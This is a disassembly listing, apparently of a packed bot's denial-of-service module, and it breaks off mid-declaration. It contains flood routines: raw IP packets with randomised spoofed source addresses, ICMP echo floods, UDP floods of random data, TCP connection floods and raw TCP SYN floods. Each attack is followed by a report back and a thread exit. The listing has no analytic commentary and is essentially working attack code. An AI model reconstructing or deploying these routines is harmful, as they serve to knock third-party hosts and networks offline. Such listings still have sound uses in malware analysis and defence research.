loc_412F4E: ; DATA XREF: UPX0:off_43A86C�o
cmp eax, 0FFFFFFFFh
jnz short loc_412FB0
call ds:dword_4CB5E8 ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push offset unk_4362E4
push eax
call sub_41B886
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_412F93
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_409A73
add esp, 14h
loc_412F93: ; CODE XREF: sub_412E9E+D3�j
lea eax, [ebp+var_3BC]
push eax
call sub_4151AD
push [ebp+var_38]
call sub_40B413
pop ecx
pop ecx
push edi
call dword_4270CC ; ExitThread
loc_412FB0: ; CODE XREF: sub_412E9E+B3�j
lea eax, [ebp+var_1B8]
push eax
call ds:dword_4CB694 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_413017
lea eax, [ebp+var_3BC]
push offset unk_4362C4
push eax
call sub_41B886
cmp [ebp+var_24], edi
pop ecx
pop ecx
jnz short loc_412FFA
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_409A73
add esp, 14h
loc_412FFA: ; CODE XREF: sub_412E9E+13A�j
lea eax, [ebp+var_3BC]
push eax
call sub_4151AD
push [ebp+var_38]
call sub_40B413
pop ecx
pop ecx
push edi
call dword_4270CC ; ExitThread
loc_413017: ; CODE XREF: sub_412E9E+122�j
push 10h
lea eax, [ebp+var_1C]
push edi
push eax
call sub_41B590
add esp, 0Ch
mov [ebp+var_1C], 2
push edi
call ds:dword_4CB654 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_1B8]
push eax
call ds:dword_4CB694 ; inet_addr
mov esi, dword_4270A8
mov [ebp+var_18], eax
mov [ebp+arg_0], edi
call esi ; GetTickCount
mov [ebp+var_8], eax
loc_413055: ; CODE XREF: sub_412E9E+2E8�j
call esi ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_30]
ja loc_413200
push 41Ch
mov ds:byte_4CE3C8, 45h
call ds:dword_4CB654 ; htons
cmp [ebp+var_2C], edi
mov ds:word_4CE3CA, ax
mov ds:word_4CE3CC, bx
mov ds:word_4CE3CE, di
mov ds:byte_4CE3D0, 80h
mov ds:byte_4CE3D1, bl
mov ds:word_4CE3D2, di
jz short loc_4130DB
call sub_41B8E2
mov ebx, eax
shl ebx, 8
call sub_41B8E2
add ebx, eax
shl ebx, 8
call sub_41B8E2
add ebx, eax
shl ebx, 8
call sub_41B8E2
add ebx, eax
push 1
mov ds:dword_4CE3D4, ebx
pop ebx
jmp short loc_4130F3
; ---------------------------------------------------------------------------
loc_4130DB: ; CODE XREF: sub_412E9E+20B�j
push [ebp+var_1BC]
call sub_40AC10
pop ecx
push eax
call ds:dword_4CB694 ; inet_addr
mov ds:dword_4CE3D4, eax
loc_4130F3: ; CODE XREF: sub_412E9E+23B�j
mov eax, [ebp+var_18]
mov ds:dword_4CE3D8, eax
call sub_41B8E2
cdq
mov ecx, 100h
idiv ecx
mov ds:byte_4CE3DC, dl
call sub_41B8E2
cdq
mov ecx, 100h
idiv ecx
mov ds:byte_4CE3DD, dl
call sub_41B8E2
cdq
mov ecx, 0F0h
push 400h
idiv ecx
mov ds:word_4CE3DE, di
mov ds:word_4CE3E2, bx
inc edx
mov ds:word_4CE3E0, dx
call sub_41B8E2
cdq
mov ecx, 0FFh
idiv ecx
push edx
push offset dword_4CE3E4
call sub_41B590
add esp, 0Ch
lea eax, [ebp+var_1C]
push 10h
push eax
push edi
push 41Ch
push offset byte_4CE3C8
push [ebp+var_4]
call ds:dword_4CB6B8 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_41318B
inc [ebp+arg_0]
jmp loc_413055
; ---------------------------------------------------------------------------
loc_41318B: ; CODE XREF: sub_412E9E+2E3�j
push [ebp+var_4]
call ds:dword_4CB6EC ; closesocket
call ds:dword_4CB5E8 ; WSAGetLastError
push eax
lea eax, [ebp+var_1B8]
push [ebp+arg_0]
push eax
push offset unk_43627C
lea eax, [ebp+var_3BC]
push 200h
push eax
call sub_41B980
add esp, 18h
cmp [ebp+var_24], edi
jnz short loc_4131E3
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_409A73
add esp, 14h
loc_4131E3: ; CODE XREF: sub_412E9E+323�j
lea eax, [ebp+var_3BC]
push eax
call sub_4151AD
push [ebp+var_38]
call sub_40B413
pop ecx
pop ecx
push edi
call dword_4270CC ; ExitThread
loc_413200: ; CODE XREF: sub_412E9E+1C8�j
push [ebp+var_4]
call ds:dword_4CB6EC ; closesocket
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_30]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_1B8]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+var_3BC]
push offset unk_436230
push eax
call sub_41B886
add esp, 1Ch
cmp [ebp+var_24], edi
jnz short loc_413268
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_409A73
add esp, 14h
loc_413268: ; CODE XREF: sub_412E9E+3A8�j
lea eax, [ebp+var_3BC]
push eax
call sub_4151AD
push [ebp+var_38]
call sub_40B413
pop ecx
pop ecx
push edi
call dword_4270CC ; ExitThread
sub_412E9E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413285 proc near ; DATA XREF: sub_401ACD+5510�o
var_10320 = byte ptr -10320h
var_344 = byte ptr -344h
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10320h
call sub_41BB20
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
push 1
pop edi
mov [eax+120h], edi
call ds:dword_4CB5DC ; IcmpCreateFile
mov [ebp+arg_0], eax
lea eax, [ebp+var_C0]
push eax
call ds:dword_4CB694 ; inet_addr
mov esi, eax
xor ebx, ebx
xor eax, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4132E0
lea eax, [ebp+var_C0]
push eax
call ds:dword_4CB6D8 ; gethostbyname
cmp eax, ebx
jz short loc_4132E6
loc_4132E0: ; CODE XREF: sub_413285+48�j
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_413343
loc_4132E6: ; CODE XREF: sub_413285+59�j
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset unk_43636C
push eax
call sub_41B886
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_413326
push ebx
lea eax, [ebp+var_344]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_409A73
add esp, 14h
loc_413326: ; CODE XREF: sub_413285+7F�j
lea eax, [ebp+var_344]
push eax
call sub_4151AD
push [ebp+var_30]
call sub_40B413
pop ecx
pop ecx
push edi
call dword_4270CC ; ExitThread
loc_413343: ; CODE XREF: sub_413285+5F�j
cmp eax, ebx
jz short loc_413353
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_4], eax
jmp short loc_413356
; ---------------------------------------------------------------------------
loc_413353: ; CODE XREF: sub_413285+C0�j
mov [ebp+var_4], esi
loc_413356: ; CODE XREF: sub_413285+CC�j
push 1Ch
lea eax, [ebp+var_20]
push ebx
push eax
call sub_41B590
or [ebp+var_18], 0FFFFFFFFh
mov eax, 0FFDCh
add esp, 0Ch
cmp [ebp+var_3C], eax
jle short loc_413376
mov [ebp+var_3C], eax
loc_413376: ; CODE XREF: sub_413285+EC�j
cmp [ebp+var_38], edi
jge short loc_41337E
mov [ebp+var_38], edi
loc_41337E: ; CODE XREF: sub_413285+F4�j
xor esi, esi
cmp [ebp+var_40], ebx
jle short loc_4133AB
loc_413385: ; CODE XREF: sub_413285+124�j
push [ebp+var_38]
lea eax, [ebp+var_20]
push 1Ch
push eax
push ebx
lea eax, [ebp+var_10320]
push [ebp+var_3C]
push eax
push [ebp+var_4]
push [ebp+arg_0]
call ds:dword_4CB56C ; IcmpSendEcho
inc esi
cmp esi, [ebp+var_40]
jl short loc_413385
loc_4133AB: ; CODE XREF: sub_413285+FE�j
push [ebp+arg_0]
call ds:dword_4CB70C ; IcmpCloseHandle
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset unk_436340
push eax
call sub_41B886
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_4133F4
push ebx
lea eax, [ebp+var_344]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_409A73
add esp, 14h
loc_4133F4: ; CODE XREF: sub_413285+14D�j
lea eax, [ebp+var_344]
push eax
call sub_4151AD
push [ebp+var_30]
call sub_40B413
pop ecx
pop ecx
push ebx
call dword_4270CC ; ExitThread
sub_413285 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413411 proc near ; DATA XREF: sub_401ACD+575C�o
var_10312 = byte ptr -10312h
var_10310 = byte ptr -10310h
var_334 = byte ptr -334h
var_134 = dword ptr -134h
var_130 = byte ptr -130h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10310h
call sub_41BB20
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_134]
rep movsd
push 1
pop esi
mov [eax+120h], esi
call dword_4270A8 ; GetTickCount
push eax
call sub_41B8D8
pop ecx
push 11h
push 2
push 2
call ds:dword_4CB6D4 ; socket
mov ebx, eax
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_41B590
add esp, 0Ch
lea eax, [ebp+var_B0]
mov [ebp+var_10], 2
push eax
call ds:dword_4CB694 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jnz short loc_4134F6
lea eax, [ebp+var_B0]
push eax
call ds:dword_4CB6D8 ; gethostbyname
cmp eax, edi
jnz short loc_4134EF
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_334]
push offset unk_4363C0
push eax
call sub_41B886
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_4134D2
push edi
lea eax, [ebp+var_334]
push [ebp+var_1C]
push eax
lea eax, [ebp+var_130]
push eax
push [ebp+var_134]
call sub_409A73
add esp, 14h
loc_4134D2: ; CODE XREF: sub_413411+9F�j
lea eax, [ebp+var_334]
push eax
call sub_4151AD
push [ebp+var_20]
call sub_40B413
pop ecx
pop ecx
push esi
call dword_4270CC ; ExitThread
loc_4134EF: ; CODE XREF: sub_413411+7F�j
mov eax, [eax+0Ch]
mov eax, [eax]
jmp short loc_4134F9
; ---------------------------------------------------------------------------
loc_4134F6: ; CODE XREF: sub_413411+6E�j
lea eax, [ebp+arg_0]
loc_4134F9: ; CODE XREF: sub_413411+E3�j
mov eax, [eax]
cmp [ebp+var_24], edi
mov [ebp+var_C], eax
jnz short loc_413514
call sub_41B8E2
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
jmp short loc_413517
; ---------------------------------------------------------------------------
loc_413514: ; CODE XREF: sub_413411+F0�j
push [ebp+var_24]
loc_413517: ; CODE XREF: sub_413411+101�j
call ds:dword_4CB654 ; htons
cmp [ebp+var_24], esi
mov [ebp+var_E], ax
jge short loc_413529
mov [ebp+var_24], esi
loc_413529: ; CODE XREF: sub_413411+113�j
mov eax, 0FFFFh
cmp [ebp+var_24], eax
jle short loc_413536
mov [ebp+var_24], eax
loc_413536: ; CODE XREF: sub_413411+120�j
mov eax, [ebp+var_30]
push 0Ah
cdq
pop ecx
idiv ecx
cmp [ebp+var_28], edi
mov [ebp+var_30], eax
jnz short loc_41354A
mov [ebp+var_28], esi
loc_41354A: ; CODE XREF: sub_413411+134�j
xor esi, esi
cmp [ebp+var_2C], edi
jle short loc_41356B
loc_413551: ; CODE XREF: sub_413411+158�j
call sub_41B8E2
cdq
mov ecx, 0FFh
idiv ecx
inc esi
cmp esi, [ebp+var_2C]
mov [ebp+esi-10311h], dl
jl short loc_413551
loc_41356B: ; CODE XREF: sub_413411+13E�j
; sub_413411+19C�j ...
mov eax, [ebp+var_30]
dec [ebp+var_30]
test eax, eax
jle short loc_4135CA
push 0Bh
pop esi
loc_413578: ; CODE XREF: sub_413411+197�j
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call sub_41B8E2
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+var_2C]
sub eax, edx
push eax
lea eax, [ebp+var_10310]
push eax
push ebx
call ds:dword_4CB6B8 ; sendto
push [ebp+var_28]
call dword_427078 ; Sleep
dec esi
jnz short loc_413578
cmp [ebp+var_24], edi
jnz short loc_41356B
call sub_41B8E2
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
call ds:dword_4CB654 ; htons
mov [ebp+var_E], ax
jmp short loc_41356B
; ---------------------------------------------------------------------------
loc_4135CA: ; CODE XREF: sub_413411+162�j
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_334]
push offset unk_436394
push eax
call sub_41B886
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_41360A
push edi
lea eax, [ebp+var_334]
push [ebp+var_1C]
push eax
lea eax, [ebp+var_130]
push eax
push [ebp+var_134]
call sub_409A73
add esp, 14h
loc_41360A: ; CODE XREF: sub_413411+1D7�j
lea eax, [ebp+var_334]
push eax
call sub_4151AD
push [ebp+var_20]
call sub_40B413
pop ecx
pop ecx
push edi
call dword_4270CC ; ExitThread
sub_413411 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413627 proc near ; DATA XREF: sub_401ACD+4DED�o
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_190]
push eax
lea eax, [ebp+var_210]
push eax
call sub_413788
add esp, 0Ch
push eax
lea eax, [ebp+var_414]
push offset dword_4363E8
push eax
call sub_41B886
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_4136A7
push esi
lea eax, [ebp+var_414]
push [ebp+var_C]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_214]
call sub_409A73
add esp, 14h
loc_4136A7: ; CODE XREF: sub_413627+5E�j
lea eax, [ebp+var_414]
push eax
call sub_4151AD
push [ebp+var_10]
call sub_40B413
pop ecx
pop ecx
push esi
call dword_4270CC ; ExitThread
pop edi
pop esi
sub_413627 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4136C6 proc near ; CODE XREF: sub_413788+27�p
var_654 = byte ptr -654h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 654h
push 10h
lea eax, [ebp+var_14]
push 0
push eax
call sub_41B590
add esp, 0Ch
mov [ebp+var_14], 2
push [ebp+arg_4]
call ds:dword_4CB654 ; htons
mov [ebp+var_12], ax
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
test eax, eax
mov [ebp+var_4], 1
jle short loc_413784
push ebx
push esi
push edi
mov [ebp+arg_4], eax
mov edi, 190h
loc_413711: ; CODE XREF: sub_4136C6+B9�j
lea esi, [ebp+var_654]
mov ebx, edi
loc_413719: ; CODE XREF: sub_4136C6+7A�j
push 0
push 1
push 2
call dword_427220 ; socket
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_41373C
lea ecx, [ebp+var_4]
push ecx
push 8004667Eh
push eax
call dword_4271F8 ; ioctlsocket
loc_41373C: ; CODE XREF: sub_4136C6+64�j
add esi, 4
dec ebx
jnz short loc_413719
lea esi, [ebp+var_654]
mov ebx, edi
loc_41374A: ; CODE XREF: sub_4136C6+96�j
lea eax, [ebp+var_14]
push 10h
push eax
push dword ptr [esi]
call dword_427214 ; connect
add esi, 4
dec ebx
jnz short loc_41374A
push 64h
call dword_427078 ; Sleep
lea esi, [ebp+var_654]
mov ebx, edi
loc_41376E: ; CODE XREF: sub_4136C6+B4�j
push dword ptr [esi]
call dword_42721C ; closesocket
add esi, 4
dec ebx
jnz short loc_41376E
dec [ebp+arg_4]
jnz short loc_413711
pop edi
pop esi
pop ebx
loc_413784: ; CODE XREF: sub_4136C6+3E�j
xor eax, eax
leave
retn
sub_4136C6 endp
; =============== S U B R O U T I N E =======================================
sub_413788 proc near ; CODE XREF: sub_413627+3C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40AAFA
push [esp+10h+arg_4]
mov edi, eax
call sub_41B779
push [esp+14h+arg_8]
mov ebx, eax
call sub_41B779
mov esi, eax
push esi
push ebx
push edi
call sub_4136C6
add esp, 18h
test eax, eax
jnz short loc_4137BE
push 1
pop eax
loc_4137BE: ; CODE XREF: sub_413788+31�j
cdq
mov ecx, 3E8h
pop edi
idiv ecx
cdq
idiv esi
pop esi
pop ebx
retn
sub_413788 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4137CD proc near ; DATA XREF: sub_401ACD+644A�o
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_190]
push eax
lea eax, [ebp+var_210]
push eax
call sub_413B1E
add esp, 0Ch
push eax
lea eax, [ebp+var_414]
push offset unk_436414
push eax
call sub_41B886
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_41384D
push esi
lea eax, [ebp+var_414]
push [ebp+var_C]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_214]
call sub_409A73
add esp, 14h
loc_41384D: ; CODE XREF: sub_4137CD+5E�j
lea eax, [ebp+var_414]
push eax
call sub_4151AD
push [ebp+var_10]
call sub_40B413
pop ecx
pop ecx
push esi
call dword_4270CC ; ExitThread
pop edi
pop esi
sub_4137CD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41386C proc near ; CODE XREF: sub_413B1E+3C�p
var_284 = byte ptr -284h
var_F4 = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_8C = byte ptr -8Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = dword ptr -58h
var_50 = word ptr -50h
var_4E = word ptr -4Eh
var_4C = dword ptr -4Ch
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = byte ptr -20h
var_1E = word ptr -1Eh
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call ds:dword_4CB5C4 ; WSAStartup
test eax, eax
jz short loc_4138AC
xor eax, eax
jmp loc_413B1A
; ---------------------------------------------------------------------------
loc_4138AC: ; CODE XREF: sub_41386C+37�j
push 1
pop edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call ds:dword_4CB6F8 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_413B12
push esi
lea ecx, [ebp+var_38]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_38], edi
call ds:dword_4CB634 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_413B08
push 10h
lea eax, [ebp+var_50]
push ebx
push eax
call sub_41B590
add esp, 0Ch
mov [ebp+var_50], 2
push [ebp+arg_8]
call ds:dword_4CB654 ; htons
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_4E], ax
mov [ebp+var_4C], esi
mov [ebp+var_20], 45h
call ds:dword_4CB654 ; htons
push [ebp+arg_8]
mov [ebp+var_1E], ax
mov [ebp+var_1C], di
mov [ebp+var_1A], bx
mov [ebp+var_18], 80h
mov [ebp+var_17], 6
mov [ebp+var_16], bx
mov [ebp+var_10], esi
call ds:dword_4CB654 ; htons
push 4000h
mov [ebp+var_32], ax
mov [ebp+var_2C], ebx
mov [ebp+var_28], 50h
mov [ebp+var_27], 2
call ds:dword_4CB654 ; htons
mov [ebp+var_26], ax
lea eax, [ebp+var_40]
push eax
mov [ebp+var_22], bx
mov [ebp+arg_8], ebx
call dword_427134 ; QueryPerformanceFrequency
lea eax, [ebp+var_8]
push eax
call dword_427130 ; QueryPerformanceCounter
push [ebp+var_3C]
mov eax, [ebp+arg_C]
cdq
push [ebp+var_40]
push edx
push eax
call sub_41D280
add eax, [ebp+var_8]
mov esi, edx
adc esi, [ebp+var_4]
mov [ebp+var_58], eax
loc_413997: ; CODE XREF: sub_41386C+25D�j
; sub_41386C+26B�j
mov [ebp+var_24], bx
call sub_41B8E2
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call ds:dword_4CB654 ; htons
mov [ebp+var_34], ax
call sub_41B8E2
mov edi, eax
shl edi, 10h
call sub_41B8E2
or edi, eax
push edi
call ds:dword_4CB654 ; htons
movzx eax, ax
mov [ebp+var_30], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call ds:dword_4CB650 ; htonl
push 14h
mov [ebp+var_14], eax
mov eax, [ebp+var_10]
pop edi
push edi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call ds:dword_4CB654 ; htons
mov [ebp+var_6E], ax
mov eax, [ebp+var_14]
mov [ebp+var_78], eax
lea eax, [ebp+var_78]
push 20h
push eax
lea eax, [ebp+var_B4]
push eax
call sub_41C310
lea eax, [ebp+var_34]
push edi
push eax
lea eax, [ebp+var_94]
push eax
call sub_41C310
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40AC69
mov [ebp+var_24], ax
lea eax, [ebp+var_20]
push edi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_41C310
lea eax, [ebp+var_34]
push edi
push eax
lea eax, [ebp+var_A0]
push eax
call sub_41C310
push 4
lea eax, [ebp+var_8C]
push ebx
push eax
call sub_41B590
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40AC69
mov [ebp+var_16], ax
lea eax, [ebp+var_20]
push edi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_41C310
add esp, 14h
lea eax, [ebp+var_50]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_C]
call ds:dword_4CB6B8 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_413ADC
add [ebp+arg_8], eax
lea eax, [ebp+var_8]
push eax
call dword_427130 ; QueryPerformanceCounter
mov eax, [ebp+var_4]
cmp eax, esi
jg short loc_413B05
jl loc_413997
mov eax, [ebp+var_8]
cmp eax, [ebp+var_58]
jnb short loc_413B05
jmp loc_413997
; ---------------------------------------------------------------------------
loc_413ADC: ; CODE XREF: sub_41386C+247�j
call ds:dword_4CB5E8 ; WSAGetLastError
push eax
lea eax, [ebp+var_F4]
push offset unk_43643C
push eax
call sub_41B886
lea eax, [ebp+var_F4]
push eax
call sub_4151AD
add esp, 10h
jmp short loc_413B08
; ---------------------------------------------------------------------------
loc_413B05: ; CODE XREF: sub_41386C+25B�j
; sub_41386C+269�j
mov ebx, [ebp+arg_8]
loc_413B08: ; CODE XREF: sub_41386C+78�j
; sub_41386C+297�j
push [ebp+var_C]
call ds:dword_4CB6EC ; closesocket
pop esi
loc_413B12: ; CODE XREF: sub_41386C+5B�j
call ds:dword_4CB5AC ; WSACleanup
mov eax, ebx
loc_413B1A: ; CODE XREF: sub_41386C+3B�j
pop edi
pop ebx
leave
retn
sub_41386C endp
; =============== S U B R O U T I N E =======================================
sub_413B1E proc near ; CODE XREF: sub_4137CD+3C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40AAFA
push [esp+10h+arg_4]
mov esi, eax
call sub_41B779
push [esp+14h+arg_8]
mov ebx, eax
call sub_41B779
mov edi, eax
call sub_41B8E2
cdq
mov ecx, 200h
push edi
idiv ecx
push ebx
lea eax, [edx+esi+100h]
push eax
push esi
call sub_41386C
add esp, 1Ch
test eax, eax
jnz short loc_413B69
push 1
pop eax
loc_413B69: ; CODE XREF: sub_413B1E+46�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_413B1E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413B78 proc near ; DATA XREF: sub_401ACD+6E45�o
var_394 = byte ptr -394h
var_194 = dword ptr -194h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 394h
mov eax, [ebp+arg_0]
push esi
push edi
push 65h
pop ecx
mov esi, eax
lea edi, [ebp+var_194]
rep movsd
mov dword ptr [eax+190h], 1
lea eax, [ebp+var_110]
push eax
call sub_41B779
pop ecx
push eax
lea eax, [ebp+var_190]
push eax
call ds:dword_4CB694 ; inet_addr
push eax
call sub_413C1B
pop ecx
pop ecx
push eax
lea eax, [ebp+var_394]
push offset dword_43645C
push eax
call sub_41B886
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_413BFC
push esi
lea eax, [ebp+var_394]
push [ebp+var_C]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_194]
call sub_409A73
add esp, 14h
loc_413BFC: ; CODE XREF: sub_413B78+62�j
lea eax, [ebp+var_394]
push eax
call sub_4151AD
push [ebp+var_10]
call sub_40B413
pop ecx
pop ecx
push esi
call dword_4270CC ; ExitThread
pop edi
pop esi
sub_413B78 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413C1B proc near ; CODE XREF: sub_413B78+41�p
var_98 = word ptr -98h
var_96 = word ptr -96h
var_94 = dword ptr -94h
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = word ptr -1Ah
